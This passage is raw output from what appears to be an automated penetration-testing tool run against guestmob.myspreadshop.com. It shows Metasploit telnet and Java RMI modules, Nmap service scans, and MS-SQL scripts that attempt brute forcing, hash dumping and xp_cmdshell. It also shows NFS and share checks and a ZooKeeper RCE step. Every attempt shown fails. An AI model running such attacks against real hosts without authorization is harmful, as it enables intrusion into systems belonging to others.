"/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.2.137:9999 - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.66.137:9999 - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.130.137:9999 - Connection reset by peer ["/usr/lib/ruby/2.7.0/socket.rb:452:in `__read_nonblock'", "/usr/lib/ruby/2.7.0/socket.rb:452:in `read_nonblock'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:91:in `block in read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:336:in `synchronize_access'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:89:in `read'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.25/lib/rex/io/stream.rb:223:in `get_once'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:160:in `recv_telnet'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:146:in `recv'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:125:in `block in connect'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/lib/msf/core/exploit/remote/telnet.rb:123:in `connect'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:35:in `block in run_host'", "/usr/lib/ruby/2.7.0/timeout.rb:95:in `block in timeout'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `block in catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:33:in `catch'", "/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb:34:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'", "/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/logging-2.3.0/lib/logging/diagnostic_context.rb:474:in `block in create_with_logging_context'"]
[*] guestmob.myspreadshop.com:9999 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:9999 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
====================================================================================•x[2022-02-21](14:58)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](14:58)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 14:58 EST
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Initiating NSE at 14:58
Completed NSE at 14:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:58
Completed Parallel DNS resolution of 1 host. at 14:58, 0.09s elapsed
Initiating SYN Stealth Scan at 14:58
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 1099/tcp on 151.101.130.137
Completed SYN Stealth Scan at 14:58, 0.09s elapsed (1 total ports)
Initiating Service scan at 14:58
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:00, 158.96s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:00
Completed Traceroute at 15:00, 0.16s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:00
Completed Parallel DNS resolution of 1 host. at 15:00, 0.07s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:00
Completed NSE at 15:00, 5.07s elapsed
Initiating NSE at 15:00
Completed NSE at 15:00, 1.09s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.12s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
1099/tcp open rmiregistry?
|_rmi-vuln-classloader: ERROR: Script execution failed (use -d to debug)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (90%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (89%), Linux 2.6.32 (89%), Linux 5.0 - 5.3 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.500 days (since Tue Jan 25 03:01:21 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 1099/tcp)
HOP RTT ADDRESS
1 155.68 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.70 seconds
Raw packets sent: 69 (6.488KB) | Rcvd: 46 (3.012KB)
====================================================================================•x[2022-02-21](15:00)x•
RUNNING METASPLOIT MODULES
====================================================================================•x[2022-02-21](15:00)x•
RHOST => guestmob.myspreadshop.com
[*] Running module against 151.101.2.137
[*] 151.101.2.137:1099 - Sending RMI Header...
[-] 151.101.2.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 151.101.66.137
[*] 151.101.66.137:1099 - Sending RMI Header...
[-] 151.101.66.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 151.101.130.137
[*] 151.101.130.137:1099 - Sending RMI Header...
[-] 151.101.130.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 151.101.194.137
[*] 151.101.194.137:1099 - Sending RMI Header...
[-] 151.101.194.137:1099 - Failed to negotiate RMI protocol
[*] Running module against 2a04:4e42:600::649
[*] 2a04:4e42:600::649:1099 - Sending RMI Header...
[-] 2a04:4e42:600::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:600::649]:1099) was unreachable.
[-] 2a04:4e42:600::649:1099 - Call stack:
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:600::649:1099 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42::649
[*] 2a04:4e42::649:1099 - Sending RMI Header...
[-] 2a04:4e42::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42::649]:1099) was unreachable.
[-] 2a04:4e42::649:1099 - Call stack:
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42::649:1099 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:200::649
[*] 2a04:4e42:200::649:1099 - Sending RMI Header...
[-] 2a04:4e42:200::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:200::649]:1099) was unreachable.
[-] 2a04:4e42:200::649:1099 - Call stack:
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:200::649:1099 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Running module against 2a04:4e42:400::649
[*] 2a04:4e42:400::649:1099 - Sending RMI Header...
[-] 2a04:4e42:400::649:1099 - Auxiliary failed: Rex::HostUnreachable The host ([2a04:4e42:400::649]:1099) was unreachable.
[-] 2a04:4e42:400::649:1099 - Call stack:
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:283:in `rescue in create_by_type'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/comm/local.rb:33:in `create'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket.rb:51:in `create_param'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.34/lib/rex/socket/tcp.rb:28:in `create'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/lib/msf/core/exploit/remote/tcp.rb:101:in `connect'
[-] 2a04:4e42:400::649:1099 - /usr/share/metasploit-framework/modules/auxiliary/gather/java_rmi_registry.rb:36:in `run'
[*] Auxiliary module execution completed
RHOST => guestmob.myspreadshop.com
[-] 151.101.2.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 1 of 8 hosts (12% complete)
[-] 151.101.66.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 2 of 8 hosts (25% complete)
[-] 151.101.130.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 3 of 8 hosts (37% complete)
[-] 151.101.194.137:1099 - Failed to negotiate RMI protocol
[*] guestmob.myspreadshop.com:1099 - Scanned 4 of 8 hosts (50% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 5 of 8 hosts (62% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 6 of 8 hosts (75% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 7 of 8 hosts (87% complete)
[*] guestmob.myspreadshop.com:1099 - Scanned 8 of 8 hosts (100% complete)
[*] Auxiliary module execution completed
+ -- --=[Port 1433 opened... running tests...
====================================================================================•x[2022-02-21](15:02)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:02)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:02 EST
NSE: Loaded 57 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:02
Completed Parallel DNS resolution of 1 host. at 15:02, 0.08s elapsed
Initiating SYN Stealth Scan at 15:02
Scanning guestmob.myspreadshop.com (151.101.66.137) [1 port]
Discovered open port 1433/tcp on 151.101.66.137
Completed SYN Stealth Scan at 15:02, 0.10s elapsed (1 total ports)
Initiating Service scan at 15:02
Scanning 1 service on guestmob.myspreadshop.com (151.101.66.137)
Completed Service scan at 15:05, 158.53s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.66.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.66.137)
Initiating Traceroute at 15:05
Completed Traceroute at 15:05, 0.13s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:05
Completed Parallel DNS resolution of 1 host. at 15:05, 0.12s elapsed
NSE: Script scanning 151.101.66.137.
Initiating NSE at 15:05
Completed NSE at 15:05, 20.66s elapsed
Initiating NSE at 15:05
Completed NSE at 15:06, 20.54s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 5.34s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.66.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.130.137 151.101.194.137 151.101.2.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649
PORT STATE SERVICE VERSION
1433/tcp open ms-sql-s?
| ms-sql-brute:
| [151.101.66.137:1433]
| No credentials found
| Errors:
|_ Network error. Skipping instance. Error: ERROR
| ms-sql-hasdbaccess:
| [151.101.66.137:1433]
|_ ERROR: No login credentials.
| ms-sql-tables:
| [151.101.66.137:1433]
|_ ERROR: No login credentials.
| ms-sql-dump-hashes:
| [151.101.66.137:1433]
|_ ERROR: No login credentials
| ms-sql-query:
| (Use --script-args=ms-sql-query.query='<QUERY>' to change query.)
| [151.101.66.137:1433]
|_ ERROR: No login credentials
| ms-sql-xp-cmdshell:
| (Use --script-args=ms-sql-xp-cmdshell.cmd='<CMD>' to change command.)
| [151.101.66.137:1433]
|_ ERROR: No login credentials.
| ms-sql-config:
| [151.101.66.137:1433]
|_ ERROR: No login credentials
| ms-sql-empty-password:
| [151.101.66.137:1433]
|_ Network error. Error: ERROR
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 20.966 days (since Mon Jan 31 15:54:55 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 1433/tcp)
HOP RTT ADDRESS
1 124.12 ms 151.101.66.137
NSE: Script Post-scanning.
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.66 seconds
Raw packets sent: 67 (6.368KB) | Rcvd: 37 (2.344KB)
+ -- --=[Port 2049 opened... running tests...
====================================================================================•x[2022-02-21](15:06)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:06)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:06 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:06
Completed Parallel DNS resolution of 1 host. at 15:06, 0.06s elapsed
Initiating SYN Stealth Scan at 15:06
Scanning guestmob.myspreadshop.com (151.101.130.137) [1 port]
Discovered open port 2049/tcp on 151.101.130.137
Completed SYN Stealth Scan at 15:06, 0.09s elapsed (1 total ports)
Initiating Service scan at 15:06
Scanning 1 service on guestmob.myspreadshop.com (151.101.130.137)
Completed Service scan at 15:08, 158.87s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.130.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.130.137)
Initiating Traceroute at 15:08
Completed Traceroute at 15:08, 0.12s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:08
Completed Parallel DNS resolution of 1 host. at 15:08, 0.09s elapsed
NSE: Script scanning 151.101.130.137.
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 1.10s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.130.137)
Host is up (0.10s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.194.137 151.101.2.137 151.101.66.137 2a04:4e42:200::649 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649
PORT STATE SERVICE VERSION
2049/tcp open nfs?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 27.505 days (since Tue Jan 25 03:01:20 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 2049/tcp)
HOP RTT ADDRESS
1 116.91 ms 151.101.130.137
NSE: Script Post-scanning.
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Initiating NSE at 15:08
Completed NSE at 15:08, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.56 seconds
Raw packets sent: 71 (6.592KB) | Rcvd: 51 (3.368KB)
====================================================================================•x[2022-02-21](15:08)x•
RUNNING RPCINFO
====================================================================================•x[2022-02-21](15:08)x•
guestmob.myspreadshop.com: RPC: Unable to receive
====================================================================================•x[2022-02-21](15:09)x•
RUNNING SHOWMOUNT
====================================================================================•x[2022-02-21](15:09)x•
clnt_create: RPC: Unable to send
====================================================================================•x[2022-02-21](15:10)x•
CHECKING FOR NULL SHARES
====================================================================================•x[2022-02-21](15:10)x•
do_connect: Connection to guestmob.myspreadshop.com failed (Error NT_STATUS_IO_TIMEOUT)
+ -- --=[Port 2181 opened... running tests...
====================================================================================•x[2022-02-21](15:10)x•
RUNNING ZOOKEEPER RCE EXPLOIT
====================================================================================•x[2022-02-21](15:10)x•
+ -- --=[Port 3306 closed... skipping.
+ -- --=[Port 3310 opened... running tests...
====================================================================================•x[2022-02-21](15:10)x•
RUNNING NMAP SCRIPTS
====================================================================================•x[2022-02-21](15:10)x•
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-21 15:10 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:10
Completed NSE at 15:10, 0.00s elapsed
Initiating NSE at 15:10
Completed NSE at 15:10, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:10
Completed Parallel DNS resolution of 1 host. at 15:10, 0.08s elapsed
Initiating SYN Stealth Scan at 15:10
Scanning guestmob.myspreadshop.com (151.101.194.137) [1 port]
Discovered open port 3310/tcp on 151.101.194.137
Completed SYN Stealth Scan at 15:10, 0.09s elapsed (1 total ports)
Initiating Service scan at 15:10
Scanning 1 service on guestmob.myspreadshop.com (151.101.194.137)
Completed Service scan at 15:13, 164.36s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against guestmob.myspreadshop.com (151.101.194.137)
Retrying OS detection (try #2) against guestmob.myspreadshop.com (151.101.194.137)
Initiating Traceroute at 15:13
Completed Traceroute at 15:13, 0.11s elapsed
Initiating Parallel DNS resolution of 1 host. at 15:13
Completed Parallel DNS resolution of 1 host. at 15:13, 0.11s elapsed
NSE: Script scanning 151.101.194.137.
Initiating NSE at 15:13
Completed NSE at 15:13, 14.21s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 1.12s elapsed
Nmap scan report for guestmob.myspreadshop.com (151.101.194.137)
Host is up (0.11s latency).
Other addresses for guestmob.myspreadshop.com (not scanned): 151.101.2.137 151.101.66.137 151.101.130.137 2a04:4e42:400::649 2a04:4e42:600::649 2a04:4e42::649 2a04:4e42:200::649
PORT STATE SERVICE VERSION
3310/tcp open dyna-access?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (90%), Linux 5.0 (90%), Linux 5.0 - 5.4 (90%), Linux 5.3 - 5.4 (90%), Linux 2.6.32 (90%), Linux 5.0 - 5.3 (89%), Linux 5.4 (88%), HP P2000 G3 NAS device (87%), Linux 3.1 (87%), Linux 3.2 (87%)
